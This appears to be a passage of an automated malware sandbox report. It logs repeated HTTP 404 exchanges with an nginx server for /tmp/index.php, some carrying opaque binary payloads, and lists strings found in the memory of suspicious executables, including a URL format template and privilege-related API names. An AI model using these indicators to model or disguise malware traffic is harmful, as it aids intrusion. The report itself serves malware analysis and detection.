6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW\|
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10 Data Ascii: #\6H=B1-lI*&
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:56:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:57:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:58:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:58:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:58:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:58:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: IXDaI.exe, 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmp, IXDaI.exe, 00000005.00000003.1268611401.0000000001120000.00000004.00001000.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000003.1624080996.0000000001290000.00000004.00001000.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: B552.exe, 0000001B.00000000.2227779245.00007FF75F304000.00000008.00000001.01000000.0000000B.sdmp, B552.exe, 0000001B.00000002.2363529476.00007FF75F313000.00000008.00000001.01000000.0000000B.sdmp, B552.exe.14.dr	String found in binary or memory: http://.css
Source: B552.exe, 0000001B.00000000.2227779245.00007FF75F304000.00000008.00000001.01000000.0000000B.sdmp, B552.exe, 0000001B.00000002.2363529476.00007FF75F313000.00000008.00000001.01000000.0000000B.sdmp, B552.exe.14.dr	String found in binary or memory: http://.jpg
Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 0000000E.00000000.1447298084.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1447298084.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 753F.exe.14.dr	String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: 753F.exe.14.dr	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
